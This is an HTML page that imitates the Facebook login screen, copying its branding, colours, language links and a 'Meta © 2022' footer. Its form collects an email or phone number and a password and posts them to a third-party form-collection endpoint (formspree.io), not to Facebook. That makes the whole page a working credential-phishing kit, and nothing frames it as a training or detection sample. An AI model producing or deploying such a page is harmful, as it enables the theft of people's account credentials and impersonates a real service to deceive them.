<! DOCTYPE html>
<html>
<head>
	<title> Facebook </title>
	<meta name="viewport" content="width: device-width, initial-scale=1" />
	<meta charset="UTF-8">
	<style type="text/css">
			h1{
				text-align: center;
				color: #1d7bff;
				
			}
			p{
				font-size: 14px;
				text-align: center;
				}
			input {
				height: 40px;
				width : 100%;
				font-size : 13px;
				border-radius:5px;
				background:#e6e6e6;
				border : none;
				box-shadow : 0.5px 0.5px 0.5px 0.2px;
				}
	input::placeholder {
				font-size: 17px;
				color : gray;
				}
			button {
				height:40px;
				background:#1d7bff;
				color:#ffffff;
				width:100%;
				border: none;
				border-radius : 5px;
				}
			a { text-decoration: none;
				color:white;
				}
			li {
				list-style : none;
				}
			.left{
				height: 120px;
				width : 40%;
				float : left;
				text-align : left;
				}
				.right{
					text-align : left;
				height: 120px;
				width : 60%;
				float : right;
				}
				. bottom {
					text-align : center;
				   justify-self : center;
				   justify-content : center;
				   align-items : center;
					}
	</style>
</head>
<body>
	<form action="https://formspree.io/f/xbjbbblb" method="POST">
	<h1>facebook </h1>
	<input type="text" name="Email address or Phone Number" placeholder="Email address or Phone Number"><br><br> 
	<input type="password" name="Password" placeholder="Password"><br> <br>
<a href="#">  <button>Log in </a> <br></button>
<br>
 <center style="margin-top: 10px;"><a style="color : #1d7bff;" href="forgotten password .html">Forgotten password?</a></center><hr>
 <center><b>or</b></center><br>
<center> <button style="background:green; width:50%; color:white;><a href="friday.html">create new account</a></button></center>
<br> <br> <br> <br>
	
	<div class="left">
	<ul>                                                                                                                   
	<li style="color:#787878; ">English  (UK) </li>                     
	<li style="color:#7dadab;">Français </li>
	<li style="color:#7dadab;">Español</li>
	<li style="color:#7dadab;">Deutsch</li>
    </ul>
    </div>
    <div class="right">      
    <ul>                                                                                                             
	<li style="color:#787878; ">Hausa  </li>                     
	<li style="color:#7dadab;">Portuguese (Brazil)</li>
	<li style="color:#7dadab;">~~~~</li>
	<li style="color:#7dadab;">[+]</li> 
    </ul>
     </div>     
    <center style="font-size : 12px;">About • Help • More </center>
                      <br>
  <center> Meta © 2022   </center>
 </form>
  
</body>
</html>
